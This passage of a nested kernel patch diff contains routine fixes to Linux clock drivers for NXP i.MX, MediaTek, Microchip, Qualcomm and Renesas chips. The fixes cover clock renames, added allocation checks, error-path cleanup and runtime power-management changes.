+ 	hws[IMX8MN_DRAM_PLL_BYPASS] = imx_clk_hw_mux_flags("dram_pll_bypass", base + 0x50, 16, 1, dram_pll_bypass_sels, ARRAY_SIZE(dram_pll_bypass_sels), CLK_SET_RATE_PARENT);
+ 	hws[IMX8MN_GPU_PLL_BYPASS] = imx_clk_hw_mux_flags("gpu_pll_bypass", base + 0x64, 28, 1, gpu_pll_bypass_sels, ARRAY_SIZE(gpu_pll_bypass_sels), CLK_SET_RATE_PARENT);
+-	hws[IMX8MN_VPU_PLL_BYPASS] = imx_clk_hw_mux_flags("vpu_pll_bypass", base + 0x74, 28, 1, vpu_pll_bypass_sels, ARRAY_SIZE(vpu_pll_bypass_sels), CLK_SET_RATE_PARENT);
++	hws[IMX8MN_M7_ALT_PLL_BYPASS] = imx_clk_hw_mux_flags("m7_alt_pll_bypass", base + 0x74, 28, 1, m7_alt_pll_bypass_sels, ARRAY_SIZE(m7_alt_pll_bypass_sels), CLK_SET_RATE_PARENT);
+ 	hws[IMX8MN_ARM_PLL_BYPASS] = imx_clk_hw_mux_flags("arm_pll_bypass", base + 0x84, 28, 1, arm_pll_bypass_sels, ARRAY_SIZE(arm_pll_bypass_sels), CLK_SET_RATE_PARENT);
+ 	hws[IMX8MN_SYS_PLL3_BYPASS] = imx_clk_hw_mux_flags("sys_pll3_bypass", base + 0x114, 28, 1, sys_pll3_bypass_sels, ARRAY_SIZE(sys_pll3_bypass_sels), CLK_SET_RATE_PARENT);
+ 
+ 	/* PLL out gate */
+ 	hws[IMX8MN_AUDIO_PLL1_OUT] = imx_clk_hw_gate("audio_pll1_out", "audio_pll1_bypass", base, 13);
+ 	hws[IMX8MN_AUDIO_PLL2_OUT] = imx_clk_hw_gate("audio_pll2_out", "audio_pll2_bypass", base + 0x14, 13);
+-	hws[IMX8MN_VIDEO_PLL1_OUT] = imx_clk_hw_gate("video_pll1_out", "video_pll1_bypass", base + 0x28, 13);
++	hws[IMX8MN_VIDEO_PLL_OUT] = imx_clk_hw_gate("video_pll_out", "video_pll_bypass", base + 0x28, 13);
+ 	hws[IMX8MN_DRAM_PLL_OUT] = imx_clk_hw_gate("dram_pll_out", "dram_pll_bypass", base + 0x50, 13);
+ 	hws[IMX8MN_GPU_PLL_OUT] = imx_clk_hw_gate("gpu_pll_out", "gpu_pll_bypass", base + 0x64, 11);
+-	hws[IMX8MN_VPU_PLL_OUT] = imx_clk_hw_gate("vpu_pll_out", "vpu_pll_bypass", base + 0x74, 11);
++	hws[IMX8MN_M7_ALT_PLL_OUT] = imx_clk_hw_gate("m7_alt_pll_out", "m7_alt_pll_bypass", base + 0x74, 11);
+ 	hws[IMX8MN_ARM_PLL_OUT] = imx_clk_hw_gate("arm_pll_out", "arm_pll_bypass", base + 0x84, 11);
+ 	hws[IMX8MN_SYS_PLL3_OUT] = imx_clk_hw_gate("sys_pll3_out", "sys_pll3_bypass", base + 0x114, 11);
+ 
+diff --git a/drivers/clk/imx/clk-imx8mp.c b/drivers/clk/imx/clk-imx8mp.c
+index 652ae58c2735f..5d68d975b4eb1 100644
+--- a/drivers/clk/imx/clk-imx8mp.c
++++ b/drivers/clk/imx/clk-imx8mp.c
+@@ -17,6 +17,7 @@
+ 
+ static u32 share_count_nand;
+ static u32 share_count_media;
++static u32 share_count_usb;
+ 
+ static const char * const pll_ref_sels[] = { "osc_24m", "dummy", "dummy", "dummy", };
+ static const char * const audio_pll1_bypass_sels[] = {"audio_pll1", "audio_pll1_ref_sel", };
+@@ -673,7 +674,8 @@ static int imx8mp_clocks_probe(struct platform_device *pdev)
+ 	hws[IMX8MP_CLK_UART2_ROOT] = imx_clk_hw_gate4("uart2_root_clk", "uart2", ccm_base + 0x44a0, 0);
+ 	hws[IMX8MP_CLK_UART3_ROOT] = imx_clk_hw_gate4("uart3_root_clk", "uart3", ccm_base + 0x44b0, 0);
+ 	hws[IMX8MP_CLK_UART4_ROOT] = imx_clk_hw_gate4("uart4_root_clk", "uart4", ccm_base + 0x44c0, 0);
+-	hws[IMX8MP_CLK_USB_ROOT] = imx_clk_hw_gate4("usb_root_clk", "hsio_axi", ccm_base + 0x44d0, 0);
++	hws[IMX8MP_CLK_USB_ROOT] = imx_clk_hw_gate2_shared2("usb_root_clk", "hsio_axi", ccm_base + 0x44d0, 0, &share_count_usb);
++	hws[IMX8MP_CLK_USB_SUSP] = imx_clk_hw_gate2_shared2("usb_suspend_clk", "osc_32k", ccm_base + 0x44d0, 0, &share_count_usb);
+ 	hws[IMX8MP_CLK_USB_PHY_ROOT] = imx_clk_hw_gate4("usb_phy_root_clk", "usb_phy_ref", ccm_base + 0x44f0, 0);
+ 	hws[IMX8MP_CLK_USDHC1_ROOT] = imx_clk_hw_gate4("usdhc1_root_clk", "usdhc1", ccm_base + 0x4510, 0);
+ 	hws[IMX8MP_CLK_USDHC2_ROOT] = imx_clk_hw_gate4("usdhc2_root_clk", "usdhc2", ccm_base + 0x4520, 0);
+diff --git a/drivers/clk/imx/clk-imx93.c b/drivers/clk/imx/clk-imx93.c
+index 99cff1fd108b5..02d6a9894521d 100644
+--- a/drivers/clk/imx/clk-imx93.c
++++ b/drivers/clk/imx/clk-imx93.c
+@@ -170,7 +170,7 @@ static const struct imx93_clk_ccgr {
+ 	{ IMX93_CLK_MU2_B_GATE,		"mu2_b",	"bus_wakeup_root",	0x8500, 0, &share_count_mub },
+ 	{ IMX93_CLK_EDMA1_GATE,		"edma1",	"m33_root",		0x8540, },
+ 	{ IMX93_CLK_EDMA2_GATE,		"edma2",	"wakeup_axi_root",	0x8580, },
+-	{ IMX93_CLK_FLEXSPI1_GATE,	"flexspi",	"flexspi_root",		0x8640, },
++	{ IMX93_CLK_FLEXSPI1_GATE,	"flexspi1",	"flexspi1_root",	0x8640, },
+ 	{ IMX93_CLK_GPIO1_GATE,		"gpio1",	"m33_root",		0x8880, },
+ 	{ IMX93_CLK_GPIO2_GATE,		"gpio2",	"bus_wakeup_root",	0x88c0, },
+ 	{ IMX93_CLK_GPIO3_GATE,		"gpio3",	"bus_wakeup_root",	0x8900, },
+@@ -240,7 +240,7 @@ static const struct imx93_clk_ccgr {
+ 	{ IMX93_CLK_AUD_XCVR_GATE,	"aud_xcvr",	"audio_xcvr_root",	0x9b80, },
+ 	{ IMX93_CLK_SPDIF_GATE,		"spdif",	"spdif_root",		0x9c00, },
+ 	{ IMX93_CLK_HSIO_32K_GATE,	"hsio_32k",	"osc_32k",		0x9dc0, },
+-	{ IMX93_CLK_ENET1_GATE,		"enet1",	"enet_root",		0x9e00, },
++	{ IMX93_CLK_ENET1_GATE,		"enet1",	"wakeup_axi_root",	0x9e00, },
+ 	{ IMX93_CLK_ENET_QOS_GATE,	"enet_qos",	"wakeup_axi_root",	0x9e40, },
+ 	{ IMX93_CLK_SYS_CNT_GATE,	"sys_cnt",	"osc_24m",		0x9e80, },
+ 	{ IMX93_CLK_TSTMR1_GATE,	"tstmr1",	"bus_aon_root",		0x9ec0, },
+@@ -258,7 +258,7 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 	struct device_node *np = dev->of_node;
+ 	const struct imx93_clk_root *root;
+ 	const struct imx93_clk_ccgr *ccgr;
+-	void __iomem *base = NULL;
++	void __iomem *base, *anatop_base;
+ 	int i, ret;
+ 
+ 	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
+@@ -285,20 +285,22 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 								    "sys_pll_pfd2", 1, 2);
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx93-anatop");
+-	base = of_iomap(np, 0);
++	anatop_base = of_iomap(np, 0);
+ 	of_node_put(np);
+-	if (WARN_ON(!base))
++	if (WARN_ON(!anatop_base))
+ 		return -ENOMEM;
+ 
+-	clks[IMX93_CLK_AUDIO_PLL] = imx_clk_fracn_gppll("audio_pll", "osc_24m", base + 0x1200,
++	clks[IMX93_CLK_AUDIO_PLL] = imx_clk_fracn_gppll("audio_pll", "osc_24m", anatop_base + 0x1200,
+ 							&imx_fracn_gppll);
+-	clks[IMX93_CLK_VIDEO_PLL] = imx_clk_fracn_gppll("video_pll", "osc_24m", base + 0x1400,
++	clks[IMX93_CLK_VIDEO_PLL] = imx_clk_fracn_gppll("video_pll", "osc_24m", anatop_base + 0x1400,
+ 							&imx_fracn_gppll);
+ 
+ 	np = dev->of_node;
+ 	base = devm_platform_ioremap_resource(pdev, 0);
+-	if (WARN_ON(IS_ERR(base)))
++	if (WARN_ON(IS_ERR(base))) {
++		iounmap(anatop_base);
+ 		return PTR_ERR(base);
++	}
+ 
+ 	for (i = 0; i < ARRAY_SIZE(root_array); i++) {
+ 		root = &root_array[i];
+@@ -327,6 +329,7 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 
+ unregister_hws:
+ 	imx_unregister_hw_clocks(clks, IMX93_CLK_END);
++	iounmap(anatop_base);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/clk/imx/clk-imxrt1050.c b/drivers/clk/imx/clk-imxrt1050.c
+index 9539d35588ee9..26108e9f7e67a 100644
+--- a/drivers/clk/imx/clk-imxrt1050.c
++++ b/drivers/clk/imx/clk-imxrt1050.c
+@@ -140,7 +140,7 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 	hws[IMXRT1050_CLK_USDHC1] = imx_clk_hw_gate2("usdhc1", "usdhc1_podf", ccm_base + 0x80, 2);
+ 	hws[IMXRT1050_CLK_USDHC2] = imx_clk_hw_gate2("usdhc2", "usdhc2_podf", ccm_base + 0x80, 4);
+ 	hws[IMXRT1050_CLK_LPUART1] = imx_clk_hw_gate2("lpuart1", "lpuart_podf", ccm_base + 0x7c, 24);
+-	hws[IMXRT1050_CLK_LCDIF_APB] = imx_clk_hw_gate2("lcdif", "lcdif_podf", ccm_base + 0x74, 10);
++	hws[IMXRT1050_CLK_LCDIF_APB] = imx_clk_hw_gate2("lcdif", "lcdif_podf", ccm_base + 0x70, 28);
+ 	hws[IMXRT1050_CLK_DMA] = imx_clk_hw_gate("dma", "ipg", ccm_base + 0x7C, 6);
+ 	hws[IMXRT1050_CLK_DMA_MUX] = imx_clk_hw_gate("dmamux0", "ipg", ccm_base + 0x7C, 7);
+ 	imx_check_clk_hws(hws, IMXRT1050_CLK_END);
+diff --git a/drivers/clk/mediatek/clk-mt7986-infracfg.c b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+index d90727a53283c..49666047bf0ed 100644
+--- a/drivers/clk/mediatek/clk-mt7986-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+@@ -153,7 +153,7 @@ static const struct mtk_gate infra_clks[] = {
+ 		    18),
+ 	GATE_INFRA1(CLK_INFRA_MSDC_66M_CK, "infra_msdc_66m", "infra_sysaxi_d2",
+ 		    19),
+-	GATE_INFRA1(CLK_INFRA_ADC_26M_CK, "infra_adc_26m", "csw_f26m_sel", 20),
++	GATE_INFRA1(CLK_INFRA_ADC_26M_CK, "infra_adc_26m", "infra_adc_frc", 20),
+ 	GATE_INFRA1(CLK_INFRA_ADC_FRC_CK, "infra_adc_frc", "csw_f26m_sel", 21),
+ 	GATE_INFRA1(CLK_INFRA_FBIST2FPC_CK, "infra_fbist2fpc", "nfi1x_sel", 23),
+ 	/* INFRA2 */
+diff --git a/drivers/clk/microchip/clk-mpfs-ccc.c b/drivers/clk/microchip/clk-mpfs-ccc.c
+index 7be028dced63d..32aae880a14f3 100644
+--- a/drivers/clk/microchip/clk-mpfs-ccc.c
++++ b/drivers/clk/microchip/clk-mpfs-ccc.c
+@@ -166,6 +166,9 @@ static int mpfs_ccc_register_outputs(struct device *dev, struct mpfs_ccc_out_hw_
+ 		struct mpfs_ccc_out_hw_clock *out_hw = &out_hws[i];
+ 		char *name = devm_kzalloc(dev, 23, GFP_KERNEL);
+ 
++		if (!name)
++			return -ENOMEM;
++
+ 		snprintf(name, 23, "%s_out%u", parent->name, i);
+ 		out_hw->divider.hw.init = CLK_HW_INIT_HW(name, &parent->hw, &clk_divider_ops, 0);
+ 		out_hw->divider.reg = data->pll_base[i / MPFS_CCC_OUTPUTS_PER_PLL] +
+@@ -200,6 +203,9 @@ static int mpfs_ccc_register_plls(struct device *dev, struct mpfs_ccc_pll_hw_clo
+ 		struct mpfs_ccc_pll_hw_clock *pll_hw = &pll_hws[i];
+ 		char *name = devm_kzalloc(dev, 18, GFP_KERNEL);
+ 
++		if (!name)
++			return -ENOMEM;
++
+ 		pll_hw->base = data->pll_base[i];
+ 		snprintf(name, 18, "ccc%s_pll%u", strchrnul(dev->of_node->full_name, '@'), i);
+ 		pll_hw->name = (const char *)name;
+diff --git a/drivers/clk/qcom/clk-krait.c b/drivers/clk/qcom/clk-krait.c
+index 45da736bd5f4c..293a9dfa7151a 100644
+--- a/drivers/clk/qcom/clk-krait.c
++++ b/drivers/clk/qcom/clk-krait.c
+@@ -114,6 +114,8 @@ static int krait_div2_set_rate(struct clk_hw *hw, unsigned long rate,
+ 
+ 	if (d->lpl)
+ 		mask = mask << (d->shift + LPL_SHIFT) | mask << d->shift;
++	else
++		mask <<= d->shift;
+ 
+ 	spin_lock_irqsave(&krait_clock_reg_lock, flags);
+ 	val = krait_get_l2_indirect_reg(d->offset);
+diff --git a/drivers/clk/qcom/dispcc-sm6350.c b/drivers/clk/qcom/dispcc-sm6350.c
+index 0c3c2e26ede90..ea6f54ed846ec 100644
+--- a/drivers/clk/qcom/dispcc-sm6350.c
++++ b/drivers/clk/qcom/dispcc-sm6350.c
+@@ -306,7 +306,7 @@ static struct clk_rcg2 disp_cc_mdss_pclk0_clk_src = {
+ 		.name = "disp_cc_mdss_pclk0_clk_src",
+ 		.parent_data = disp_cc_parent_data_5,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_5),
+-		.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE,
++		.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE | CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_pixel_ops,
+ 	},
+ };
+@@ -385,7 +385,7 @@ static struct clk_branch disp_cc_mdss_byte0_clk = {
+ 				&disp_cc_mdss_byte0_clk_src.clkr.hw,
+ 			},
+ 			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE,
++			.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE | CLK_OPS_PARENT_ENABLE,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+diff --git a/drivers/clk/qcom/gcc-ipq806x.c b/drivers/clk/qcom/gcc-ipq806x.c
+index 718de17a1e600..6447f3e81b555 100644
+--- a/drivers/clk/qcom/gcc-ipq806x.c
++++ b/drivers/clk/qcom/gcc-ipq806x.c
+@@ -79,7 +79,9 @@ static struct clk_regmap pll4_vote = {
+ 	.enable_mask = BIT(4),
+ 	.hw.init = &(struct clk_init_data){
+ 		.name = "pll4_vote",
+-		.parent_names = (const char *[]){ "pll4" },
++		.parent_data = &(const struct clk_parent_data){
++			.fw_name = "pll4", .name = "pll4",
++		},
+ 		.num_parents = 1,
+ 		.ops = &clk_pll_vote_ops,
+ 	},
+diff --git a/drivers/clk/qcom/gcc-sm8250.c b/drivers/clk/qcom/gcc-sm8250.c
+index 9755ef4888c19..a0ba37656b07b 100644
+--- a/drivers/clk/qcom/gcc-sm8250.c
++++ b/drivers/clk/qcom/gcc-sm8250.c
+@@ -3267,7 +3267,7 @@ static struct gdsc usb30_prim_gdsc = {
+ 	.pd = {
+ 		.name = "usb30_prim_gdsc",
+ 	},
+-	.pwrsts = PWRSTS_OFF_ON,
++	.pwrsts = PWRSTS_RET_ON,
+ };
+ 
+ static struct gdsc usb30_sec_gdsc = {
+@@ -3275,7 +3275,7 @@ static struct gdsc usb30_sec_gdsc = {
+ 	.pd = {
+ 		.name = "usb30_sec_gdsc",
+ 	},
+-	.pwrsts = PWRSTS_OFF_ON,
++	.pwrsts = PWRSTS_RET_ON,
+ };
+ 
+ static struct gdsc hlos1_vote_mmnoc_mmu_tbu_hf0_gdsc = {
+diff --git a/drivers/clk/qcom/lpassaudiocc-sc7280.c b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+index 063e0365f3119..1339f9211a149 100644
+--- a/drivers/clk/qcom/lpassaudiocc-sc7280.c
++++ b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+@@ -722,33 +722,17 @@ static const struct of_device_id lpass_audio_cc_sc7280_match_table[] = {
+ };
+ MODULE_DEVICE_TABLE(of, lpass_audio_cc_sc7280_match_table);
+ 
+-static void lpassaudio_pm_runtime_disable(void *data)
+-{
+-	pm_runtime_disable(data);
+-}
+-
+-static void lpassaudio_pm_clk_destroy(void *data)
+-{
+-	pm_clk_destroy(data);
+-}
+-
+-static int lpassaudio_create_pm_clks(struct platform_device *pdev)
++static int lpass_audio_setup_runtime_pm(struct platform_device *pdev)
+ {
+ 	int ret;
+ 
+ 	pm_runtime_use_autosuspend(&pdev->dev);
+ 	pm_runtime_set_autosuspend_delay(&pdev->dev, 50);
+-	pm_runtime_enable(&pdev->dev);
+-
+-	ret = devm_add_action_or_reset(&pdev->dev, lpassaudio_pm_runtime_disable, &pdev->dev);
+-	if (ret)
+-		return ret;
+-
+-	ret = pm_clk_create(&pdev->dev);
++	ret = devm_pm_runtime_enable(&pdev->dev);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = devm_add_action_or_reset(&pdev->dev, lpassaudio_pm_clk_destroy, &pdev->dev);
++	ret = devm_pm_clk_create(&pdev->dev);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -756,7 +740,7 @@ static int lpassaudio_create_pm_clks(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		dev_err(&pdev->dev, "failed to acquire iface clock\n");
+ 
+-	return ret;
++	return pm_runtime_resume_and_get(&pdev->dev);
+ }
+ 
+ static int lpass_audio_cc_sc7280_probe(struct platform_device *pdev)
+@@ -765,7 +749,7 @@ static int lpass_audio_cc_sc7280_probe(struct platform_device *pdev)
+ 	struct regmap *regmap;
+ 	int ret;
+ 
+-	ret = lpassaudio_create_pm_clks(pdev);
++	ret = lpass_audio_setup_runtime_pm(pdev);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -775,8 +759,8 @@ static int lpass_audio_cc_sc7280_probe(struct platform_device *pdev)
+ 
+ 	regmap = qcom_cc_map(pdev, desc);
+ 	if (IS_ERR(regmap)) {
+-		pm_runtime_disable(&pdev->dev);
+-		return PTR_ERR(regmap);
++		ret = PTR_ERR(regmap);
++		goto exit;
+ 	}
+ 
+ 	clk_zonda_pll_configure(&lpass_audio_cc_pll, regmap, &lpass_audio_cc_pll_config);
+@@ -788,20 +772,18 @@ static int lpass_audio_cc_sc7280_probe(struct platform_device *pdev)
+ 	ret = qcom_cc_really_probe(pdev, &lpass_audio_cc_sc7280_desc, regmap);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "Failed to register LPASS AUDIO CC clocks\n");
+-		pm_runtime_disable(&pdev->dev);
+-		return ret;
++		goto exit;
+ 	}
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, &lpass_audio_cc_reset_sc7280_desc);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "Failed to register LPASS AUDIO CC Resets\n");
+-		pm_runtime_disable(&pdev->dev);
+-		return ret;
++		goto exit;
+ 	}
+ 
+ 	pm_runtime_mark_last_busy(&pdev->dev);
++exit:
+ 	pm_runtime_put_autosuspend(&pdev->dev);
+-	pm_runtime_put_sync(&pdev->dev);
+ 
+ 	return ret;
+ }
+@@ -839,14 +821,15 @@ static int lpass_aon_cc_sc7280_probe(struct platform_device *pdev)
+ 	struct regmap *regmap;
+ 	int ret;
+ 
+-	ret = lpassaudio_create_pm_clks(pdev);
++	ret = lpass_audio_setup_runtime_pm(pdev);
+ 	if (ret)
+ 		return ret;
+ 
+ 	if (of_property_read_bool(pdev->dev.of_node, "qcom,adsp-pil-mode")) {
+ 		lpass_audio_cc_sc7280_regmap_config.name = "cc";
+ 		desc = &lpass_cc_sc7280_desc;
+-		return qcom_cc_probe(pdev, desc);
++		ret = qcom_cc_probe(pdev, desc);
++		goto exit;
+ 	}
+ 
+ 	lpass_audio_cc_sc7280_regmap_config.name = "lpasscc_aon";
+@@ -854,18 +837,22 @@ static int lpass_aon_cc_sc7280_probe(struct platform_device *pdev)
+ 	desc = &lpass_aon_cc_sc7280_desc;
+ 
+ 	regmap = qcom_cc_map(pdev, desc);
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	if (IS_ERR(regmap)) {
++		ret = PTR_ERR(regmap);
++		goto exit;
++	}
+ 
+ 	clk_lucid_pll_configure(&lpass_aon_cc_pll, regmap, &lpass_aon_cc_pll_config);
+ 
+ 	ret = qcom_cc_really_probe(pdev, &lpass_aon_cc_sc7280_desc, regmap);
+-	if (ret)
++	if (ret) {
+ 		dev_err(&pdev->dev, "Failed to register LPASS AON CC clocks\n");
++		goto exit;
++	}
+ 
+ 	pm_runtime_mark_last_busy(&pdev->dev);
++exit:
+ 	pm_runtime_put_autosuspend(&pdev->dev);
+-	pm_runtime_put_sync(&pdev->dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/clk/qcom/lpasscorecc-sc7180.c b/drivers/clk/qcom/lpasscorecc-sc7180.c
+index ac09b7b840aba..a5731994cbed1 100644
+--- a/drivers/clk/qcom/lpasscorecc-sc7180.c
++++ b/drivers/clk/qcom/lpasscorecc-sc7180.c
+@@ -356,7 +356,7 @@ static const struct qcom_cc_desc lpass_audio_hm_sc7180_desc = {
+ 	.num_gdscs = ARRAY_SIZE(lpass_audio_hm_sc7180_gdscs),
+ };
+ 
+-static int lpass_create_pm_clks(struct platform_device *pdev)
++static int lpass_setup_runtime_pm(struct platform_device *pdev)
+ {
+ 	int ret;
+ 
+@@ -375,7 +375,7 @@ static int lpass_create_pm_clks(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		dev_err(&pdev->dev, "failed to acquire iface clock\n");
+ 
+-	return ret;
++	return pm_runtime_resume_and_get(&pdev->dev);
+ }
+ 
+ static int lpass_core_cc_sc7180_probe(struct platform_device *pdev)
+@@ -384,7 +384,7 @@ static int lpass_core_cc_sc7180_probe(struct platform_device *pdev)
+ 	struct regmap *regmap;
+ 	int ret;
+ 
+-	ret = lpass_create_pm_clks(pdev);
++	ret = lpass_setup_runtime_pm(pdev);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -392,12 +392,14 @@ static int lpass_core_cc_sc7180_probe(struct platform_device *pdev)
+ 	desc = &lpass_audio_hm_sc7180_desc;
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+ 	if (ret)
+-		return ret;
++		goto exit;
+ 
+ 	lpass_core_cc_sc7180_regmap_config.name = "lpass_core_cc";
+ 	regmap = qcom_cc_map(pdev, &lpass_core_cc_sc7180_desc);
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	if (IS_ERR(regmap)) {
++		ret = PTR_ERR(regmap);
++		goto exit;
++	}
+ 
+ 	/*
+ 	 * Keep the CLK always-ON
+@@ -415,6 +417,7 @@ static int lpass_core_cc_sc7180_probe(struct platform_device *pdev)
+ 	ret = qcom_cc_really_probe(pdev, &lpass_core_cc_sc7180_desc, regmap);
+ 
+ 	pm_runtime_mark_last_busy(&pdev->dev);
++exit:
+ 	pm_runtime_put_autosuspend(&pdev->dev);
+ 
+ 	return ret;
+@@ -425,14 +428,19 @@ static int lpass_hm_core_probe(struct platform_device *pdev)
+ 	const struct qcom_cc_desc *desc;
+ 	int ret;
+ 
+-	ret = lpass_create_pm_clks(pdev);
++	ret = lpass_setup_runtime_pm(pdev);
+ 	if (ret)
+ 		return ret;
+ 
+ 	lpass_core_cc_sc7180_regmap_config.name = "lpass_hm_core";
+ 	desc = &lpass_core_hm_sc7180_desc;
+ 
+-	return qcom_cc_probe_by_index(pdev, 0, desc);
++	ret = qcom_cc_probe_by_index(pdev, 0, desc);
++
++	pm_runtime_mark_last_busy(&pdev->dev);
++	pm_runtime_put_autosuspend(&pdev->dev);
++
++	return ret;
+ }
+ 
+ static const struct of_device_id lpass_hm_sc7180_match_table[] = {
+diff --git a/drivers/clk/renesas/r8a779a0-cpg-mssr.c b/drivers/clk/renesas/r8a779a0-cpg-mssr.c
+index d74d46833012f..e02542ca24a06 100644
+--- a/drivers/clk/renesas/r8a779a0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779a0-cpg-mssr.c
+@@ -116,7 +116,7 @@ static const struct cpg_core_clk r8a779a0_core_clks[] __initconst = {
+ 	DEF_FIXED("cp",		R8A779A0_CLK_CP,	CLK_EXTAL,	2, 1),
+ 	DEF_FIXED("cl16mck",	R8A779A0_CLK_CL16MCK,	CLK_PLL1_DIV2,	64, 1),
+ 
+-	DEF_GEN4_SDH("sdh0",	R8A779A0_CLK_SD0H,	CLK_SDSRC,	   0x870),
++	DEF_GEN4_SDH("sd0h",	R8A779A0_CLK_SD0H,	CLK_SDSRC,	   0x870),
+ 	DEF_GEN4_SD("sd0",	R8A779A0_CLK_SD0,	R8A779A0_CLK_SD0H, 0x870),
+ 
+ 	DEF_BASE("rpc",		R8A779A0_CLK_RPC, CLK_TYPE_GEN4_RPC, CLK_RPCSRC),
+diff --git a/drivers/clk/renesas/r8a779f0-cpg-mssr.c b/drivers/clk/renesas/r8a779f0-cpg-mssr.c
+index 4baf355e26d88..27b668def357f 100644
+--- a/drivers/clk/renesas/r8a779f0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779f0-cpg-mssr.c
+@@ -113,7 +113,7 @@ static const struct cpg_core_clk r8a779f0_core_clks[] __initconst = {
+ 	DEF_FIXED("sasyncperd2", R8A779F0_CLK_SASYNCPERD2, R8A779F0_CLK_SASYNCPERD1, 2, 1),
+ 	DEF_FIXED("sasyncperd4", R8A779F0_CLK_SASYNCPERD4, R8A779F0_CLK_SASYNCPERD1, 4, 1),
+ 
+-	DEF_GEN4_SDH("sdh0",	R8A779F0_CLK_SD0H,	CLK_SDSRC,	   0x870),
++	DEF_GEN4_SDH("sd0h",	R8A779F0_CLK_SD0H,	CLK_SDSRC,	   0x870),
+ 	DEF_GEN4_SD("sd0",	R8A779F0_CLK_SD0,	R8A779F0_CLK_SD0H, 0x870),
+ 
+ 	DEF_BASE("rpc",		R8A779F0_CLK_RPC,	CLK_TYPE_GEN4_RPC, CLK_RPCSRC),
+@@ -126,10 +126,10 @@ static const struct cpg_core_clk r8a779f0_core_clks[] __initconst = {
+ };
+ 
+ static const struct mssr_mod_clk r8a779f0_mod_clks[] __initconst = {
+-	DEF_MOD("hscif0",	514,	R8A779F0_CLK_S0D3),
+-	DEF_MOD("hscif1",	515,	R8A779F0_CLK_S0D3),
+-	DEF_MOD("hscif2",	516,	R8A779F0_CLK_S0D3),
+-	DEF_MOD("hscif3",	517,	R8A779F0_CLK_S0D3),
++	DEF_MOD("hscif0",	514,	R8A779F0_CLK_SASYNCPERD1),
++	DEF_MOD("hscif1",	515,	R8A779F0_CLK_SASYNCPERD1),
++	DEF_MOD("hscif2",	516,	R8A779F0_CLK_SASYNCPERD1),
++	DEF_MOD("hscif3",	517,	R8A779F0_CLK_SASYNCPERD1),
+ 	DEF_MOD("i2c0",		518,	R8A779F0_CLK_S0D6_PER),
+ 	DEF_MOD("i2c1",		519,	R8A779F0_CLK_S0D6_PER),
+ 	DEF_MOD("i2c2",		520,	R8A779F0_CLK_S0D6_PER),
+@@ -142,10 +142,10 @@ static const struct mssr_mod_clk r8a779f0_mod_clks[] __initconst = {
+ 	DEF_MOD("msiof3",	621,	R8A779F0_CLK_MSO),
+ 	DEF_MOD("pcie0",	624,	R8A779F0_CLK_S0D2),
+ 	DEF_MOD("pcie1",	625,	R8A779F0_CLK_S0D2),
+-	DEF_MOD("scif0",	702,	R8A779F0_CLK_S0D12_PER),
+-	DEF_MOD("scif1",	703,	R8A779F0_CLK_S0D12_PER),
+-	DEF_MOD("scif3",	704,	R8A779F0_CLK_S0D12_PER),
+-	DEF_MOD("scif4",	705,	R8A779F0_CLK_S0D12_PER),
++	DEF_MOD("scif0",	702,	R8A779F0_CLK_SASYNCPERD4),
++	DEF_MOD("scif1",	703,	R8A779F0_CLK_SASYNCPERD4),
++	DEF_MOD("scif3",	704,	R8A779F0_CLK_SASYNCPERD4),
++	DEF_MOD("scif4",	705,	R8A779F0_CLK_SASYNCPERD4),
+ 	DEF_MOD("sdhi0",        706,    R8A779F0_CLK_SD0),
+ 	DEF_MOD("sys-dmac0",	709,	R8A779F0_CLK_S0D3_PER),
+ 	DEF_MOD("sys-dmac1",	710,	R8A779F0_CLK_S0D3_PER),
+diff --git a/drivers/clk/renesas/r9a06g032-clocks.c b/drivers/clk/renesas/r9a06g032-clocks.c
+index 1488c9d6e6394..983faa5707b9c 100644
+--- a/drivers/clk/renesas/r9a06g032-clocks.c
++++ b/drivers/clk/renesas/r9a06g032-clocks.c
+@@ -412,7 +412,7 @@ static int r9a06g032_attach_dev(struct generic_pm_domain *pd,
+ 	int error;
+ 	int index;
+ 
+-	while (!of_parse_phandle_with_args(np, "clocks", "#clock-cells", i,
++	while (!of_parse_phandle_with_args(np, "clocks", "#clock-cells", i++,
+ 					   &clkspec)) {
+ 		if (clkspec.np != pd->dev.of_node)
+ 			continue;
+@@ -425,7 +425,6 @@ static int r9a06g032_attach_dev(struct generic_pm_domain *pd,
+ 			if (error)
+ 				return error;
+ 		}
+-		i++;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/clk/rockchip/clk-pll.c b/drivers/clk/rockchip/clk-pll.c
+index f7827b3b7fc1c..6e5e502be44a6 100644
+--- a/drivers/clk/rockchip/clk-pll.c
